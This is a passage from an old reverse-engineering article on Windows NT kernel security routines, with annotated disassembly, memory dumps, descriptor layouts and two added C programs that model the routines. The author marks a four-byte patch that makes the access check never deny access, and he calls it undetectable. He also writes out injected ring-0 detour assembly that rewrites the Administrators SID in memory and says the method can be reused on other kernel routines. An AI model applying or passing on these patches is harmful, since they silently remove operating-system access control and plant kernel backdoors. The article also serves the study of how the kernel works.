; check w/ the patch
80199B62 jnz short loc_80199B79
80199B64
80199B64 loc_80199B64: ; CODE XREF: sub_80199836+2BD
80199B64 ; sub_80199836+2D3
80199B64 mov ecx, [ebp+var_10] ; our loop routine,
; called from above as
; we loop around and
; around.
; var_10 is the number
; of ACE's
80199B67 inc [ebp+var_C] ; var_C is the current
; ACE
80199B6A movzx eax, word ptr [esi+2] ; byte 3 is the offset
; to the next ACE
80199B6E add esi, eax ; FFWD
80199B70 cmp [ebp+var_C], ecx ; check to see if we
; are done
80199B73 jb loc_80199AE7 ; if not, go back up...
80199B79
80199B79 loc_80199B79: ; CODE XREF: sub_80199836+2AB
80199B79 ; sub_80199836+2B3
80199B79 xor eax, eax ; this is our general
; exit routine
80199B7B test edi, edi ; if EDI isnt empty,
; then a DENIED state
; was reached above
80199B7D jz short loc_80199B91 ; so patch the JZ into
; a JMP so we never
; return ACCESS_DENIED
; <PATCH ME>
80199B7F mov ecx, [ebp+arg_1C]
80199B82 mov [ecx], eax
80199B84 mov eax, [ebp+arg_24]
; STATUS_ACCESS_DENIED
80199B87 mov dword ptr [eax], 0C0000022h
80199B8D xor al, al
80199B8F jmp short loc_80199C0C
80199B91 ;
===========================================================================
80199B91
80199B91 loc_80199B91: ; CODE XREF: sub_80199836+347
80199B91 mov eax, [ebp+1Ch]
80199B94 mov ecx, [ebp+arg_1C] ; result code into
; &arg_1C
80199B97 or eax, [ebp+arg_C] ; checked passed in
; mask
80199B9A mov [ecx], eax
80199B9C mov ecx, [ebp+arg_24] ; result code into
; &arg_24, should be
; zero
80199B9F jnz short loc_80199BAB ; if everything above
; went OK, we should
; jump
80199BA1 xor al, al
80199BA3 mov dword ptr [ecx], 0C0000022h
80199BA9 jmp short loc_80199C0C
80199BAB ;
===========================================================================
80199BAB
80199BAB loc_80199BAB: ; CODE XREF: sub_80199836+369
80199BAB mov dword ptr [ecx], 0 ; Good and Happy
; things, we passed!
80199BB1 test ebx, ebx
80199BB3 jz short loc_80199C0A
80199BB5 push [ebp+arg_20]
80199BB8 push dword ptr [ebp+var_2]
80199BBB push dword ptr [ebp-1]
80199BBE push ebx
80199BBF call sub_8019DC80
80199BC4 jmp short loc_80199C0A
80199BC6 ;
===========================================================================
removed code here
80199C0A loc_80199C0A: ; CODE XREF: sub_80199836+123
80199C0A ; sub_80199836+152
80199C0A mov al, 1
80199C0C
80199C0C loc_80199C0C: ; CODE XREF: sub_80199836+55
80199C0C ; sub_80199836+8F
80199C0C pop edi
80199C0D pop esi
80199C0E pop ebx
80199C0F mov esp, ebp
80199C11 pop ebp
80199C12 retn 28h ; Outta Here!
80199C12 sub_80199836 endp
Whew!
Some STRUCTURE dumps along the way:
:d eax
0023:E1A1C174 01 00 04 80 DC 00 00 00-EC 00 00 00 00 00 00 00 ................
; this looks like a SD
0023:E1A1C184 14 00 00 00 02 00 C8 00-08 00 00 00 00 09 18 00 ................
0023:E1A1C194 00 00 00 10 01 01 00 00-00 00 00 03 00 00 00 00 ................
0023:E1A1C1A4 00 00 00 00 00 02 18 00-FF 01 1F 00 01 01 00 00 ................
0023:E1A1C1B4 00 00 00 03 00 00 00 00-00 00 00 00 00 09 18 00 ................
0023:E1A1C1C4 00 00 00 10 01 01 00 00-00 00 00 05 12 00 00 00 ................
0023:E1A1C1D4 00 00 00 00 00 02 18 00-FF 01 1F 00 01 01 00 00 ................
0023:E1A1C1E4 00 00 00 05 12 00 00 00-00 00 00 00 00 09 18 00 ................
:d esi
0023:E1A1C188 02 00 C8 00 08 00 00 00-00 09 18 00 00 00 00 10 ................
; OFFSET into the SD (DACL)
0023:E1A1C198 01 01 00 00 00 00 00 03-00 00 00 00 00 00 00 00 ................
0023:E1A1C1A8 00 02 18 00 FF 01 1F 00-01 01 00 00 00 00 00 03 ................
0023:E1A1C1B8 00 00 00 00 00 00 00 00-00 09 18 00 00 00 00 10 ................
0023:E1A1C1C8 01 01 00 00 00 00 00 05-12 00 00 00 00 00 00 00 ................
0023:E1A1C1D8 00 02 18 00 FF 01 1F 00-01 01 00 00 00 00 00 05 ................
0023:E1A1C1E8 12 00 00 00 00 00 00 00-00 09 18 00 00 00 00 10 ................
0023:E1A1C1F8 01 02 00 00 00 00 00 05-20 00 00 00 20 02 00 00 ........ ... ...
The following formats appear to be the SD, DACL, and ACE:
SD:
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
r | |04|80|fo| | | |fg| | | | | | |fd| | --==>
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
r: Revision, must be 1
fo: Offset to Owner SID
fg: Offset to Group SID
fd: Offset to DACL
ACL:
-- -- -- -- -- -- -- -- -- --
r | | | |na| | | |sa| | --==>
-- -- -- -- -- -- -- -- -- --
r: Revision?
na: Number of ACE's
sa: Start of first ACE
ACE:
-- -- -- -- -- -- -- -- -- --
t |i |oa| |am| | | |ss| | --==>
-- -- -- -- -- -- -- -- -- --
t: type, 0, 1, or 4
i: the ACE is ignored if this value isn't 8
oa: offset to next ACE
am: access mask associated with this SID
ss: start of the SID, normally at offset 8, but for ACE type 4, will be at
offset 0Ch
So there you have it, a 4 byte patch. Application of this patch will allow
almost anyone access to almost any object on your NT domain. Also, it is
undetectable when auditing ACL's and such. The only indication something
is wrong is the fact you're now opening the SAM database from a normal account
w/o a hitch... I can kill any process without being denied access.. God knows
what the NULL User session can get away with! I like that. 8-/. Gee, it's
almost USEFUL isn't it?
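Added example, not part of the original article: the ACE loop as read from
sub_80199836 above, written in C and run over a constructed self-relative SD in
the layout of the structure dumps above. Assumptions: the token is a list of
SIDs and sub_801997C2 matches an ACE SID against any of them by byte compare;
the flag-8 test in the loop is INHERIT_ONLY_ACE, and the elided no-DACL path
grants all access.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define SE_DACL_PRESENT         0x0004u
#define INHERIT_ONLY_ACE        0x08u         /* the "test byte ptr [esi+1], 8" in the ACE loop */
#define ACCESS_ALLOWED_ACE_TYPE 0
#define ACCESS_DENIED_ACE_TYPE  1
#define STATUS_ACCESS_DENIED    0xC0000022u
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static size_t sid_len(const uint8_t *sid) { return 8 + 4 * (size_t)sid[1]; } /* header + 4/sub-auth */
/* Constructed sample: a self-relative SD in the layout of the ":d eax" dump above
 * (20-byte header, ACL header at the DACL offset, ACE header of 8 bytes, SID at ACE+8). */
static const uint8_t SAMPLE_SD[] = {
    0x01, 0x00, 0x04, 0x80, 0x78, 0x00, 0x00, 0x00,   /* Revision 1, Control 0x8004, owner at 0x78 */
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,   /* no group SID, no SACL */
    0x14, 0x00, 0x00, 0x00,                           /* DACL at 0x14 */
    /* +0x14 ACL header: revision 2, size 0x64, 4 ACEs */
    0x02, 0x00, 0x64, 0x00, 0x04, 0x00, 0x00, 0x00,
    /* +0x1C allow, flags INHERIT_ONLY, size 0x14, GENERIC_ALL, S-1-5-18 (SYSTEM) */
    0x00, 0x08, 0x14, 0x00, 0x00, 0x00, 0x00, 0x10,
    0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x12, 0x00, 0x00, 0x00,
    /* +0x30 deny, size 0x18, mask 0x2 (FILE_WRITE_DATA), S-1-5-32-546 (Guests) */
    0x01, 0x00, 0x18, 0x00, 0x02, 0x00, 0x00, 0x00,
    0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x22, 0x02, 0x00, 0x00,
    /* +0x48 allow, size 0x18, mask 0x1F01FF (FILE_ALL_ACCESS), S-1-5-32-544 (Administrators) */
    0x00, 0x00, 0x18, 0x00, 0xFF, 0x01, 0x1F, 0x00,
    0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00,
    /* +0x60 allow, size 0x18, mask 0x120089 (FILE_GENERIC_READ), S-1-5-32-545 (Users) */
    0x00, 0x00, 0x18, 0x00, 0x89, 0x00, 0x12, 0x00,
    0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x21, 0x02, 0x00, 0x00,
    /* +0x78 owner SID: S-1-5-32-544 */
    0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00,
};
/* Constructed caller tokens: a token is the user's SID plus its group SIDs. */
static const uint8_t SID_SYSTEM[] = { 1, 1, 0, 0, 0, 0, 0, 5, 0x12, 0, 0, 0 };
static const uint8_t SID_ADMINS[] = { 1, 2, 0, 0, 0, 0, 0, 5, 0x20, 0, 0, 0, 0x20, 0x02, 0, 0 };
static const uint8_t SID_USERS[]  = { 1, 2, 0, 0, 0, 0, 0, 5, 0x20, 0, 0, 0, 0x21, 0x02, 0, 0 };
static const uint8_t SID_GUESTS[] = { 1, 2, 0, 0, 0, 0, 0, 5, 0x20, 0, 0, 0, 0x22, 0x02, 0, 0 };
static const uint8_t *const TOKEN_SYSTEM[] = { SID_SYSTEM };
static const uint8_t *const TOKEN_ADMIN[]  = { SID_ADMINS };
static const uint8_t *const TOKEN_USER[]   = { SID_USERS };
static const uint8_t *const TOKEN_GUEST[]  = { SID_USERS, SID_GUESTS };

/* Assumption: sub_801997C2 reports a match when the ACE SID equals any SID in the token. */
static int token_holds(const uint8_t *const *token, size_t ntoken, const uint8_t *sid)
{
    for (size_t i = 0; i < ntoken; i++)
        if (sid_len(token[i]) == sid_len(sid) && memcmp(token[i], sid, sid_len(sid)) == 0)
            return 1;
    return 0;
}

/* The ACE loop of sub_80199836 with `remaining` standing in for EDI: 0 and the granted
 * mask once allow ACEs have cleared every desired bit, else STATUS_ACCESS_DENIED. */
static uint32_t access_check(const uint8_t *sd, const uint8_t *const *token, size_t ntoken,
                             uint32_t desired, uint32_t *granted)
{
    uint32_t remaining = desired, dacl_off = rd32(sd + 16);
    *granted = 0;
    if (!(rd16(sd + 2) & SE_DACL_PRESENT) || dacl_off == 0) {
        *granted = desired;              /* no DACL (the elided loc_80199BC6 path): NT grants all */
        return 0;
    }
    const uint8_t *acl = sd + dacl_off;
    uint16_t count = rd16(acl + 4);      /* movzx eax, word ptr [esi+4]: number of ACEs */
    const uint8_t *ace = acl + 8;        /* add esi, 8: first ACE */
    for (uint16_t i = 0; i < count && remaining != 0; i++, ace += rd16(ace + 2)) {
        if (ace[1] & INHERIT_ONLY_ACE)   /* test byte ptr [esi+1], 8: inherit-only, skip */
            continue;
        if (!token_holds(token, ntoken, ace + 8))
            continue;
        uint32_t mask = rd32(ace + 4);
        if (ace[0] == ACCESS_ALLOWED_ACE_TYPE)
            remaining &= ~mask;          /* not eax; and edi, eax */
        else if (ace[0] == ACCESS_DENIED_ACE_TYPE && (mask & remaining))
            break;                       /* test [esi+4], edi; jnz -> leave with EDI set */
    }
    if (remaining != 0)                  /* loc_80199B79: EDI not empty => STATUS_ACCESS_DENIED */
        return STATUS_ACCESS_DENIED;
    *granted = desired;
    return 0;
}
/* Granted mask on success, 0 when denied (desired is never 0 below). */
static uint32_t check(const uint8_t *const *token, size_t ntoken, uint32_t desired)
{
    uint32_t granted;
    return access_check(SAMPLE_SD, token, ntoken, desired, &granted) == 0 ? granted : 0;
}

int main(void)
{
    printf("Admins  FILE_ALL_ACCESS   -> %08X\n", (unsigned)check(TOKEN_ADMIN, 1, 0x1F01FF));
    printf("Users   FILE_WRITE_DATA   -> %08X\n", (unsigned)check(TOKEN_USER, 1, 0x2));
    printf("Guests  FILE_GENERIC_READ -> %08X\n", (unsigned)check(TOKEN_GUEST, 2, 0x120089));
    printf("SYSTEM  GENERIC_ALL       -> %08X (inherit-only ACE skipped)\n", (unsigned)check(TOKEN_SYSTEM, 1, 0x10000000));
    return 0;
}
```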
Reverse Engineering & Patch of the RtlGetOwnerSecurityDescriptor() function
---------------------------------------------------------------------------
As if the last patch wasn't good enough, this patch should illustrate how easy
it is to add your own code to the Kernel. Simply by patching a single jump, I
was able to detour the execution path into a highwayman's patch, and return
back to normal execution without a hitch. This patch alters a SID in memory,
violating the integrity of the security system. With a little creative light,
this patch could be so much more. There are hundreds of routines in
ntoskrnl.exe. You are executing your own code in ring-0, so anything is
possible. If for no other reason, this paper should open your mind to the
possibilities. Reversing the NT Kernel is nothing new, I am quite sure.
I would bet that the NSA has the full source to the NT Kernel, and has written
some very elaborate patches. In fact, they were probably on that for NT 3.5.
80184AAC ;
===========================================================================
80184AAF align 4
80184AB0 ; Exported entry 719. RtlGetOwnerSecurityDescriptor
80184AB0
80184AB0 ;
===========================================================================
80184AB0
80184AB0 ; S u b r o u t i n e
80184AB0 ; Attributes: bp-based frame
80184AB0
80184AB0 public RtlGetOwnerSecurityDescriptor
80184AB0 RtlGetOwnerSecurityDescriptor proc near ; CODE XREF: sub_8018F318+22
80184AB0
80184AB0 arg_0 = dword ptr 8
80184AB0 arg_4 = dword ptr 0Ch
80184AB0 arg_8 = dword ptr 10h
80184AB0
80184AB0 push ebp
80184AB1 mov edx, [esp+arg_0]
80184AB5 mov ebp, esp
80184AB7 push esi
//
// MessageId: STATUS_UNKNOWN_REVISION
//
// MessageText:
//
// Indicates a revision number encountered or specified is not one
// known by the service. It may be a more recent revision than the
// service is aware of.
//
#define STATUS_UNKNOWN_REVISION ((NTSTATUS)0xC0000058L)
On SD Revision:
The user mode function InitializeSecurityDescriptor() will set the revision
number for the SD. The InitializeSecurityDescriptor() function initializes a
new security descriptor.
BOOL InitializeSecurityDescriptor(
PSECURITY_DESCRIPTOR pSecurityDescriptor, // address of security descriptor
DWORD dwRevision // revision level
);
Parameters:
pSecurityDescriptor: Points to a SECURITY_DESCRIPTOR structure that the
function initializes.
dwRevision: Specifies the revision level to assign to the security descriptor.
This must be SECURITY_DESCRIPTOR_REVISION.
80184AB8 cmp byte ptr [edx], 1 ; Ptr to decimal
; value usually 01,
; (SD Revision)
80184ABB jz short loc_80184AC4
; STATUS CODE (STATUS_UNKNOWN_REVISION)
80184ABD mov eax, 0C0000058h
80184AC2 jmp short loc_80184AF3 ; will exit
The next block here does some operations against the object stored at *edx,
which is our first argument to this function. I think this may be a SD. There
are two different forms of an SD, absolute and self-relative.. here is the doc:
A security descriptor can be in absolute or self-relative form. In
self-relative form, all members of the structure are located contiguously
in memory. In absolute form, the structure only contains pointers to the
members.
This [edx] object is passed in as absolute:
Argument 1 (a SECURITY_DESCRIPTOR structure):
:d edx
0023:E1F47488 01 00 04 80 5C 00 00 00-6C 00 00 00 00 00 00 00 ....\...l.......
; 01 Revision, Flags 04,
; Offset to Owner SID is 5C,
; Offset to Primary Group SID is 6C
0023:E1F47498 14 00 00 00 02 00 48 00-02 00 00 00 00 00 18 00 ......H.........
0023:E1F474A8 FF 00 0F 00 01 02 00 00-00 00 00 05 20 00 00 00 ............ ...
0023:E1F474B8 20 02 00 00 00 00 14 00-FF 00 0F 00 01 01 00 00 ...............
0023:E1F474C8 00 00 00 05 12 00 00 00-00 00 4E 00 C8 FD 14 00 ..........N.....
0023:E1F474D8 E8 00 14 00 41 00 64 00-6D 00 69 00 01 02 00 00 ....A.d.m.i.....
; SIDS start here, see below
0023:E1F474E8 00 00 00 05 20 00 00 00-20 02 00 00 01 05 00 00 .... ... .......
0023:E1F474F8 00 00 00 05 15 00 00 00-BA 5D FF 0C 5C 4F CF 51 .........]..\O.Q
80184AC4 ;
===========================================================================
80184AC4
80184AC4 loc_80184AC4: ; CODE XREF:
; RtlGetOwnerSecurityDescriptor+B
80184AC4 mov eax, [edx+4] ; we are here if the revision
; is good
80184AC7 xor ecx, ecx
80184AC9 test eax, eax ; 01 00 04 80 >5C< which is
; [edx+4] must not be zero
; if the value IS zero, this
; means the SD does NOT have a
; owner, and it sets argument
; 2 to NULL, then returns,
; ignoring argument 3
; altogether.
80184ACB jnz short loc_80184AD4
80184ACD mov esi, [ebp+arg_4]
80184AD0 mov [esi], ecx
80184AD2 jmp short loc_80184AE1
80184AD4 ;
===========================================================================
80184AD4
80184AD4 loc_80184AD4: ; CODE XREF:
; RtlGetOwnerSecurityDescriptor+1B
80184AD4 test byte ptr [edx+3], 80h ; 01 00 04 >80< 5C
; which is [edx+3]
; must be 80
80184AD8 jz short loc_80184ADC
80184ADA add eax, edx ; adds edx to 5C,
; which must be an
; offset to the SID
; within the SD
Note a couple of SIDS hanging around in this memory location. The first one is
the Owner, the second one must be the Group. The first SID, 1-5-20-220 is
BUILTIN\Administrators. By changing the 220 to a 222, we can alter this to be
BUILTIN\Guests. This will cause serious security problems. That second SID
happens to be a long nasty one.. that is your first indication that it's NOT a
built-in group. In fact, in this case, the group is ANSUZ\None, a local group
on my NT Server (my server is obviously named ANSUZ.. ;)
:d eax
0023:E1A49F84 01 02 00 00 00 00 00 05-20 00 00 00 20 02 00 00 ........ ... ...
; This is a SID in memory (1-5-20-220)
0023:E1A49F94 01 05 00 00 00 00 00 05-15 00 00 00 BA 5D FF 0C .............]..
; another SID
0023:E1A49FA4 5C 4F CF 51 FD 28 9A 4E-01 02
; (1-5-15-CFF5DBA-51CF4F5C-4E9A28FD-201)
Here we start working with arguments 1 & 2:
80184ADC
80184ADC loc_80184ADC: ; CODE XREF:
; RtlGetOwnerSecurityDescriptor+28
80184ADC mov esi, [ebp+arg_4]
80184ADF mov [esi], eax ; moving the address of the
; SID through the user
; supplied ptr (PSID pOwner)
80184AE1
80184AE1 loc_80184AE1: ; CODE XREF:
; RtlGetOwnerSecurityDescriptor+22
80184AE1 mov ax, [edx+2] ; some sort of flags
; 01 00 >04< 80 5C
80184AE5 mov edx, [ebp+arg_8]; argument 3, which is to be
; filled in with
; flags data
80184AE8 and al, 1
80184AEA cmp al, 1 ; checking against a mask of
; 0x01
80184AEC setz cl ; set based on flags register
; (if previous compare was
; true)
80184AEF xor eax, eax ; status is zero, all good ;)
80184AF1 mov [edx], cl ; the value is set for
; SE_OWNER_DEFAULTED
; true/false
80184AF3
80184AF3 loc_80184AF3: ; CODE XREF:
; RtlGetOwnerSecurityDescriptor+12
80184AF3 pop esi
80184AF4 pop ebp
80184AF5 retn 0Ch ; outta here, status in EAX
80184AF5 RtlGetOwnerSecurityDescriptor endp
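Added example, not part of the original article: the owner lookup as read from
the listing above, written in C for the self-relative form only (the
absolute-form pointer case is left out), over a constructed SD that carries the
two SIDs from the :d eax dump, with a decoder that prints a binary SID in the
usual decimal S-1-5-... notation (the listing's 1-5-20-220 is the same value
written in hex).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SE_OWNER_DEFAULTED      0x0001u
#define SE_SELF_RELATIVE        0x8000u
#define STATUS_SUCCESS          0x00000000u
#define STATUS_UNKNOWN_REVISION 0xC0000058u

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }

/* Constructed self-relative SD: 20-byte header in the layout of the ":d edx" dump above,
 * owner at +0x14 and group at +0x24 carrying the two SIDs from the ":d eax" dump
 * (the group SID's last sub-authority 0x201 completed as decoded there). */
static const uint8_t SAMPLE_SD[] = {
    0x01, 0x00, 0x00, 0x80,   /* Revision 1, Sbz1, Control 0x8000 (self-relative) */
    0x14, 0x00, 0x00, 0x00,   /* Owner offset 0x14 */
    0x24, 0x00, 0x00, 0x00,   /* Group offset 0x24 */
    0x00, 0x00, 0x00, 0x00,   /* SACL offset: none */
    0x00, 0x00, 0x00, 0x00,   /* DACL offset: none (not needed for the owner path) */
    0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00,
    0x01, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x15, 0x00, 0x00, 0x00, 0xBA, 0x5D, 0xFF, 0x0C,
    0x5C, 0x4F, 0xCF, 0x51, 0xFD, 0x28, 0x9A, 0x4E, 0x01, 0x02, 0x00, 0x00,
};
/* Constructed edge cases: no owner with SE_OWNER_DEFAULTED set, and an unknown revision. */
static const uint8_t NO_OWNER_SD[20] = { 0x01, 0x00, 0x01, 0x80 };
static const uint8_t BAD_REV_SD[20]  = { 0x02, 0x00, 0x00, 0x80, 0x14, 0x00, 0x00, 0x00 };

/* Renders a binary SID as S-R-A-s1-...: byte 0 revision, byte 1 sub-authority count,
 * bytes 2..7 the 48-bit big-endian identifier authority, then little-endian DWORDs. */
static const char *sid_to_string(const uint8_t *sid)
{
    static char buf[128];                 /* not reentrant; fine for a demo */
    uint64_t auth = 0;
    for (int i = 2; i < 8; i++)
        auth = (auth << 8) | sid[i];
    int len = snprintf(buf, sizeof buf, "S-%u-%llu", (unsigned)sid[0], (unsigned long long)auth);
    for (unsigned i = 0; i < sid[1] && len > 0 && (size_t)len < sizeof buf; i++)
        len += snprintf(buf + len, sizeof buf - (size_t)len, "-%lu",
                        (unsigned long)rd32(sid + 8 + 4 * i));
    return buf;
}

/* RtlGetOwnerSecurityDescriptor as read from the listing above, self-relative form:
 * NTSTATUS in the return value, the owner pointer (NULL when the SD has no owner)
 * through *owner, SE_OWNER_DEFAULTED through *defaulted. */
static uint32_t get_owner(const uint8_t *sd, const uint8_t **owner, int *defaulted)
{
    if (sd[0] != 1)                                   /* cmp byte ptr [edx], 1 */
        return STATUS_UNKNOWN_REVISION;               /* mov eax, 0C0000058h */
    uint32_t off = rd32(sd + 4);                      /* mov eax, [edx+4] */
    uint16_t control = rd16(sd + 2);                  /* mov ax, [edx+2] */
    if (off == 0)
        *owner = NULL;                                /* mov [esi], ecx (ecx = 0) */
    else if (control & SE_SELF_RELATIVE)              /* test byte ptr [edx+3], 80h */
        *owner = sd + off;                            /* add eax, edx: offset -> pointer */
    else
        *owner = NULL;                                /* absolute form: [edx+4] is a raw pointer, not modelled */
    *defaulted = (control & SE_OWNER_DEFAULTED) != 0; /* and al,1 / cmp al,1 / setz cl / mov [edx],cl */
    return STATUS_SUCCESS;                            /* xor eax, eax */
}

/* What a caller of the routine sees for each descriptor. */
static const char *describe_owner(const uint8_t *sd)
{
    const uint8_t *owner = NULL;
    int defaulted = 0;
    if (get_owner(sd, &owner, &defaulted) != STATUS_SUCCESS)
        return "STATUS_UNKNOWN_REVISION";
    if (owner == NULL)
        return defaulted ? "no owner (SE_OWNER_DEFAULTED)" : "no owner";
    return sid_to_string(owner);
}

int main(void)
{
    printf("owner   : %s\n", describe_owner(SAMPLE_SD));
    printf("group   : %s\n", sid_to_string(SAMPLE_SD + rd32(SAMPLE_SD + 8)));
    printf("no owner: %s\n", describe_owner(NO_OWNER_SD));
    printf("bad rev : %s\n", describe_owner(BAD_REV_SD));
    return 0;
}
```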
This routine is called from the following stack(s):
(NtOpenProcessToken)
Break due to BPX ntoskrnl!RtlGetOwnerSecurityDescriptor (ET=31.98
milliseconds)
:stack at 001B:00000000 (SS:EBP 0010:00000000)
ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8E3FF04)
ntoskrnl!NtOpenProcessToken+025E at 0008:80198834 (SS:EBP 0010:F8E3FEEC)
ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8E3FE50)
ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8E3FD80)
ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8E3FD48)
ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8E3FD34)
ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
0010:F8E3FD20)
=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP
0010:F8E3FD00)
(PsCreateWin32Process)
Break due to BPX ntoskrnl!RtlGetOwnerSecurityDescriptor (ET=3.62 milliseconds)
:stack
ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04)
ntoskrnl!PsCreateWin32Process+01E7 at 0008:80192B5D (SS:EBP 0010:F8CDFEDC)
ntoskrnl!PsCreateSystemThread+04CE at 0008:8019303E (SS:EBP 0010:F8CDFE6C)
ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFDC8)
ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFCF8)
ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFCC0)
ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFCAC)
ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
0010:F8CDFC98)
=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP
0010:F8CDFC78)
(PsCreateSystemThread)
:stack
ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04)
ntoskrnl!PsCreateSystemThread+0731 at 0008:801932A1 (SS:EBP 0010:F8CDFEDC)
ntoskrnl!PsCreateSystemProcess+05FD at 0008:801938B1 (SS:EBP 0010:F8CDFE8C)
ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFDEC)
ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFD1C)
ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFCE4)
ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFCD0)
ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
0010:F8CDFCBC)
=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP
0010:F8CDFC9C)
(SeTokenImpersonationLevel)
:stack
ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04)
ntoskrnl!PsCreateSystemThread+0731 at 0008:801932A1 (SS:EBP 0010:F8CDFEDC)
ntoskrnl!PsRevertToSelf+0063 at 0008:8013577D (SS:EBP 0010:F8CDFE8C)
ntoskrnl!SeTokenImpersonationLevel+01A3 at 0008:8019F12F (SS:EBP 0010:F8CDFDE8)
ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFD9C)
ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFCCC)
ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFC94)
ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFC80)
ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
0010:F8CDFC6C)
=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP
0010:F8CDFC4C)
I began by trying to patch this call. I decided to try and detect the Owner
SID of BUILTIN\Administrators (1-5-20-220) and change it to BUILTIN\Users
(1-5-20-221) on the fly. The following code is what I patched in:
First, I located a region of memory where I could dump some extra code. For
testing, I chose the region at 08:8000F2B0. I found it to be initially all
zeroed out, so I figured it safe for a while. Next, I assembled some
instructions into this new area:
8000F2B0: push ebx
mov ebx, [eax + 08]
cmp ebx, 20 ; check the 20 in 1-5-20-XXX
nop ; nop's are leftovers from
; debugging
nop
jnz 8000f2c2 ; skip it if we aren't looking
; at a 20
mov word ptr [eax+0c], 221 ; write over old RID w/ new RID
; of 221
nop
8000f2c2: pop ebx
nop
mov esi, [ebp + 0c] ; the two instructions
mov [esi], eax ; that I nuked to make the
; initial jump
jmp 80184ae1
Now, notice the last two instructions prior to the jump back to NT. To make
this call, I had to install a JMP instruction into the NT subroutine itself.
Doing that nuked two actual instructions, as follows:
Original code:
80184ADC mov esi, [ebp+arg_4];<**===--- PATCHING A JUMP
; HERE
80184ADF mov [esi], eax
80184AE1 mov ax, [edx+2] ; some sort of flags
; 01 00 >04< 80 5C
80184AE5 mov edx, [ebp+arg_8]; argument 3, which is to be
; filled in with flags data
After patch:
80184ADC JMP 8000F2B0 ; Note: this nuked two real
; instructions...
80184AE1 mov ax, [edx+2] ; some sort of flags
; 01 00 >04< 80 5C
80184AE5 mov edx, [ebp+arg_8]; argument 3, which is to be
; filled in with flags data
So, to correct this, the code that I am jumping to runs the two missing
instructions:
mov esi, [ebp + 0c] ; the two instructions
mov [esi], eax ; that I nuked to make the
; initial jump
Alas, all is good. I tested this patch for quite some time without a problem.
To verify that it was working, I checked the memory during the patch, and sure
enough, it was turning SID 1-5-20-220 into SID 1-5-20-221. However, as with
all projects, I was not out of the water yet. When getting the security
properties for a file, the Owner still shows up as Administrators. This patch
is clearly called during such a query, as I have set breakpoints. However,
the displayed OWNER is still administrators, even though I am patching the
SID in memory. Further investigation has revealed that this routine isn't
called to check access to a file object, but is called for opening process
tokens, creating processes, and creating threads. Perhaps someone could shed
some more light on this? Nonetheless, the methods used in this patch can be
re-purposed for almost any Kernel routine, so I hope it has been a useful
journey.
Appendix A: Exported functions for the SRM:
-------------------------------------------
SeAccessCheck
SeAppendPrivileges
SeAssignSecurity
SeAuditingFileEvents
SeAuditingFileOrGlobalEvents
SeCaptureSecurityDescriptor
SeCaptureSubjectContext
SeCloseObjectAuditAlarm
SeCreateAccessState
